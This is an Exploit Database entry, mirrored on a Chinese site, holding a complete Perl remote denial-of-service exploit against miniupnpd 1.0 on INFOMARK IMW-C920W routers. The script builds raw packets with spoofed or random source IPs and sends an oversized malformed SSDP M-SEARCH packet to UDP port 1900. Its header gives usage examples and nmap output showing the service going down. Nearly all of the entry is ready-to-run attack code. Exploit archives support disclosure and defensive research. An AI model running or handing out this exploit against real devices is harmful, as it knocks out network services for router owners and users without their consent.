INFOMARK IMW-C920W MiniUPnPd 1.0 – Denial of Service

• Exploit Database
• 18 阅读

• 作者： Todor Donev
  日期： 2015-07-07
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/37517/

• #!/usr/bin/perl
  #
  #miniupnpd/1.0 remote denial of service exploit
  #
  #Copyright 2015 (c) Todor Donev 
  #todor.donev@gmail.com
  #http://www.ethical-hacker.org/
  #https://www.facebook.com/ethicalhackerorg
  #
  #The SSDP protocol can discover Plug & Play devices, 
  #with uPnP (Universal Plug and Play). SSDP is HTTP 
  #like protocol and work with NOTIFY and M-SEARCH 
  #methods.
  #
  #See also: 
  #CVE-2013-0229 
  #http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
  #CVE-2013-0230
  #http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
  #
  #Tested on
  #Device Name :IMW-C920W
  #Device Manufacturer :INFOMARK (http://infomark.co.kr)
  #
  #These devices are commonly used by Max Telecom, Bulgaria
  #
  #Disclaimer:
  #This or previous program is for Educational
  #purpose ONLY. Do not use it without permission.
  #The usual disclaimer applies, especially the
  #fact that Todor Donev is not liable for any
  #damages caused by direct or indirect use of the
  #information or functionality provided by these
  #programs. The author or any Internet provider
  #bears NO responsibility for content or misuse
  #of these programs or any derivatives thereof.
  #By using these programs you accept the fact
  #that any damage (dataloss, system crash,
  #system compromise, etc.) caused by the use
  #of these programs is not Todor Donev's
  #responsibility.
  # 
  #Use at your own risk!
  #
  #See also:
  #SSDP Reflection DDoS Attacks 
  #http://tinyurl.com/mqwj6xt
  #
  #######################################
  #
  # # perl miniupnpd.pl
  # 
  # [miniupnpd/1.0 remote denial of service exploit ]
  # [ =============================================== ]
  # [Usage:					
  # [ ./miniupnpd.pl <victim address> <spoofed address>
  # [Example:
  # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
  # [Example:
  # [ perl miniupnpd.pl 192.168.1.1
  # [ =============================================== ]
  # [ 2015<todor.donev@gmail.com> Todor Donev2015 ]
  #
  # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
  #
  # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
  # Nmap scan report for 192.168.1.1
  # Host is up (0.00078s latency).
  # PORT STATE SERVICE
  # 1900/udp openupnp
  # | upnp-info:
  # | 192.168.1.1
  # | Server: 1.0 UPnP/1.0 miniupnpd/1.0
  # | Location: http://192.168.1.1:5000/rootDesc.xml
  # | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
  # | Name: INFOMARK Router
  # | Manufacturer: INFOMARK
  # | Model Descr: INFOMARK Router
  # | Model Name: INFOMARK Router
  # | Model Version: 1
  # | Name: WANDevice
  # | Manufacturer: MiniUPnP
  # | Model Descr: WAN Device
  # | Model Name: WAN Device
  # | Model Version: 20070228
  # | Name: WANConnectionDevice
  # | Manufacturer: MiniUPnP
  # | Model Descr: MiniUPnP daemon
  # | Model Name: MiniUPnPd
  # |_Model Version: 20070228
  # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
  #
  # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
  #
  # # perl miniupnpd.pl 192.168.1.1
  #
  # [miniupnpd/1.0 remote denial of service exploit ]
  # [ =============================================== ]
  # [ Target: 192.168.1.1
  # [ Send malformed SSDP packet..
  #
  # # nmap -sU 192.168.1.1 -p1900
  #
  # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
  # Nmap scan report for 192.168.1.1
  # Host is up (0.00085s latency).
  # PORT STATESERVICE
  # 1900/udp closed upnp// GOOD NIGHT, SWEET PRINCE.... :D
  # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
  #
  # Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
  #
  #
  # Special thanks to HD Moore ..
  #
  
  use Socket;
  
  if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script use RAW Socket.\n"; 
   exit;
  }
  
  my $ip_src = (gethostbyname($ARGV[1]))[4];
  my $ip_dst = (gethostbyname($ARGV[0]))[4];
  
  print "\n[miniupnpd/1.0 remote denial of service exploit ]\n";
  print "[ =============================================== ]\n";
  select(undef, undef, undef, 0.40);
  
  if (!defined $ip_dst) {
  print "[Usage:\n[ ./$0 <victim address> <spoofed address>\n";
  select(undef, undef, undef, 0.55);
  print "[Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
  print "[Example:\n[ perl $0 192.168.1.1\n";
  print "[ =============================================== ]\n";
  print "[ 2015<todor.donev\@gmail.com> Todor Donev2015 ]\n\n";
  exit;
  }
  socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
  setsockopt(RAW, 0, 1, 1) or die $!;
  main();
  
  # Main program
  sub main {
  my $packet;
  
  $packet = iphdr();
  $packet .= udphdr();
  $packet .= payload();
  # b000000m...
  send_packet($packet);
  }
  
  # IP header (Layer 3)
  sub iphdr {
  my $ip_ver 	= 4; 			# IP Version 4(4 bits)
  my $iphdr_len	= 5;		# IP Header Length(4 bits)
  my $ip_tos 	= 0;		# Differentiated Services (8 bits)
  my $ip_total_len 	= $iphdr_len + 20;		# IP Header Length + Data (16 bits)
  my $ip_frag_id 	= 0;		# Identification Field(16 bits)
  my $ip_frag_flag 	= 000;			# IP Frag Flags (R DF MF) (3 bits)
  my $ip_frag_offset 	= 0000000000000;			# IP Fragment Offset(13 bits)
  my $ip_ttl 	= 255;		# IP TTL(8 bits)
  my $ip_proto 	= 17; 		# IP Protocol (8 bits)
  my $ip_checksum	= 0;		# IP Checksum (16 bits)
  my $ip_src=gethostbyname(&randip) if !$ip_src; 		# IP Source 		(32 bits)
  # IP Packet construction
  	my $iphdr	= pack(
  				'H2 H2 n n B16 h2 c n a4 a4',
  				$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
  				$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
  				$ip_ttl, $ip_proto, $ip_checksum,
  				$ip_src, $ip_dst
  			);
  
  return $iphdr;
  }
  
  # UDP header (Layer 4)
  sub udphdr {
  my $udp_src_port	= 31337; # UDP Sort Port (16 bits) (0-65535)
  my $udp_dst_port	= 1900;	 # UDP Dest Port (16 btis) (0-65535)
  my $udp_len		= 8 + length(payload()); # UDP Length(16 bits) (0-65535)
  my $udp_checksum 	= 0; # UDP Checksum(16 bits) (XOR of header)
  
  # UDP Packet
  	my $udphdr= pack(
  				'n n n n',
  				$udp_src_port, $udp_dst_port,
  				$udp_len, $udp_checksum
  				);
  return $udphdr;
  }
  
  # Create SSDP Bomb
  sub payload {
   my $data;
   my $head;
   $data = "M-SEARCH * HTTP\/1.1\\r\\n";
   for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
   my $payload = pack('a' . length($data), $data);
  return $payload;
  }
  
  # Generate random source ip address
  sub randip () {
  srand(time() ^ ($$ + ($$ << 15)));
   my $ipdata;
  $ipdata 	= join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
   my $ipsrc 		= pack('A' . length($ipdata), rand($ipdata));
  return $ipdata;
  }
  
  # Send the malformed packet
  sub send_packet {
  print "[ Target: $ARGV[0]\n";
  select(undef, undef, undef, 0.30);
  print "[ Send malformed SSDP packet..\n\n";
  send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
  }